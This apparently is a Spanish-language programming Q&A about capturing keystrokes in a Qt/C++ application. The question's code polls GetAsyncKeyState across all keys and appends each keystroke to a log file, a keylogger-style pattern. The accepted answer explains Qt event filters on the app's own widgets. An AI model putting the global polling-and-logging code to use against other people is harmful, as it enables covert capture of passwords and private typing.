# Capturas pulsaciones de teclados con QT y C++

Tags: qt

Estoy intentando hacer una aplicacion con QT que me pille las teclas pero aunque funciona muchas veces determinadas teclas de mi ordenador no las coge por ejemplo escribo Hola como estas y me pone Hoa coo estas .

Codigo con el que capturo las teclas es comprobarteclas y el otro es para añadir como cadena a un archivo:

```
if(num>=32)
{
    log.open(QFile::Append);
    cadenaa.append(num);
    log.write(cadenaa);
    cadenaa.clear();
    log.close();
}

if(num==13){
    log.open(QFile::Append);
    log.write("\n");
    log.close();
}

short comprobarTeclas()
{
    short i = 0;
    for(i = 0; i < 255; i++){
        if(GetAsyncKeyState(i) == -32767)
            return i;
    }
    return 0;
}
```

Ejemplo de un mainwindow form en qt:

```
#include "mainwindow.h"
#include "ui_mainwindow.h"

MainWindow::MainWindow(QWidget *parent) :
    QMainWindow(parent),
    ui(new Ui::MainWindow)
{
    ui->setupUi(this);
}

MainWindow::~MainWindow()
{
    delete ui;
}
```

Answer (score 1, accepted):

La mejor forma de capturar teclas es hacer uso de un filtro de eventos. Son muy sencillos de crear y podemos personalizarlos completamente, lo cual dota a este mecanismo de una increible versatilidad.

La idea es sencilla de implementar:

Lo primero es crear un nuevo objeto que herede de `QObject`. Este objeto debe sobreescribir el método `eventFilter`:

```
class FiltroDeEventosPersonalizado
  : public QObject
{
  Q_OBJECT

protected:

  bool eventFilter(QObject *obj, QEvent *event) override;
};
```

La implementación del método `eventFilter` es la que va a gestionar los eventos a capturar. Básicamente se trata de tratar los eventos que nos interesen y retornar true cuando dicho evento deba ser descartado.

Imaginemos que únicamente queremos detectar la pulsación de la tecla `A`:

```
bool
FiltroDeEventosPersonalizado::eventFilter(
    QObject *obj,
    QEvent *event)
{
  if (event->type() == QEvent::KeyPress) {
    QKeyEvent* keyEvent = static_cast<QKeyEvent*>(event);
    if( keyEvent->key() == Qt::Key_A )
     qDebug() << "Tecla 'A' presionada";
    return true;
  }

  return QObject::eventFilter(obj, event);
}
```

**NOTA:** Si no deseas descartar los eventos basta con retornar `false`.

Ahora para usar la clase simplemente la *instalamos* en aquel objeto sobre el que queremos actuar.

Para la ocasión imaginemos que se trata de un `QLineEdit`:

```
FiltroDeEventosPersonalizado* filtro = new FiltroDeEventosPersonalizado;

QLineEdit* lineEdit = new QLineEdit;
lineEdit->installEventFilter(filtro);
```

Para más información al respecto echa un vistazo a [este enlace](http://doc.qt.io/qt-4.8/qobject.html#installEventFilter).

Un saludo.

Comment: bueno gracias por todo

Comment: Los puedes mostrar como prefieras. `qDebug()` es una de las formas, pero también puedes crear un `QLineEdit` y mostrar ahí los mensajes... o un `QLabel`. Al final solo se trata de crear un mensaje de texto acorde al evento capturado. Si quieres algo más conciso quizás sería recomendable crear un hilo nuevo para exponer tu pregunta.